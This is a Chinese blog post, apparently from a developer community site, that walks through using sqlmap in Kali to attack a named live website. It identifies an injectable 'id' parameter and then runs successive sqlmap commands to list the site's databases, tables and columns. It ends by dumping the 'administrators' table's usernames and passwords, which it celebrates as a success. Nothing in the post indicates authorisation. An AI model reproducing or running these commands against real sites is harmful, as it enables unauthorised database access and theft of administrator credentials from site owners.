kali之sqlmap应用实战

前言

好久没有玩kali,都说kali玩的好,局子进的早,在各大神帖子下,今天打算用sqlmap来获取某个悲催网站的管理员账号和密码,www.bible-history.com这个就是传说中经常被攻击的网站,今天就拿它开刀。

实践

sqlmap工具通常都是用sql自动注入来获取网站管理员密码。输入https://www.bible-history.com/subcat.php这个网址跳转的网站界面如下:
网站图片输入https://www.bible-history.com/subcat.php?id=2,跳转到如下界面:
图片直接在网址后面添加?id=1(后面的数字可以改变),看看与原网页是否相同,如果不同,表示存在注入点,在添加?id=1后,我们发现网页变了。说明可以进行sql注入,来获取权限。这时,我们将存在注入漏洞的网址拿到sqlmap中进行跑一跑。
命令一:sqlmap -u “网址”
例如:root@kali:~# sqlmap -u “https://www.bible-history.com/subcat.php?id=2
在这里插入图片描述命令输入以后,回车运行。我这里用的是kali系统自带的sqlmap工具,sqlmap将会自动跑一段时间,测试网站的服务器和数据库,等待他跑完就行。如果中途有停顿需要你选择的,一直按Enter键就行,直到运行结束。结束以后,会给出该网站的数据库、操作系统、服务器等版本信息。
在这里插入图片描述这时,我们需要去查看该网站的当前数据库,命令二: sqlmap -u ” 网址 ” --dbs
例如: root@kali:~# sqlmap -u “https://www.bible-history.com/subcat.php?id=2” --dbs
在这里插入图片描述跑一段时间后,sqlmap把网站当前的数据库信息给出来
在这里插入图片描述命令三: sqlmap -u ” 网址 ” -D 数据库名 --tables 查看当前网站的数据库表
例如: root@kali:~# sqlmap -u “https://www.bible-history.com/subcat.php?id=2” -D bible_history --tables
在这里插入图片描述结果:
在这里插入图片描述当我们拿到表信息之后,就需要去查看表中包含的列信息。
命令四: sqlmap -u ” 网址 ” -D 数据库名 -T 表名 --columns
root@kali:~# sqlmap -u “https://www.bible-history.com/subcat.php?id=2” -D bible_history -T administrators --columns
在这里插入图片描述结果:
在这里插入图片描述表中字段明显拿到了,哈哈,去查看表中姓名和密码
使用命令:root@kali:~# sqlmap -u “http://www.bible-history.com/subcat.php?id=2” -D bible_history -T administrators -C admin_id,admin_username,admin_password --dump
在这里插入图片描述结果:
在这里插入图片描述成功获取管理员姓名和密码!!!!!

  • 26
    点赞
  • 150
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值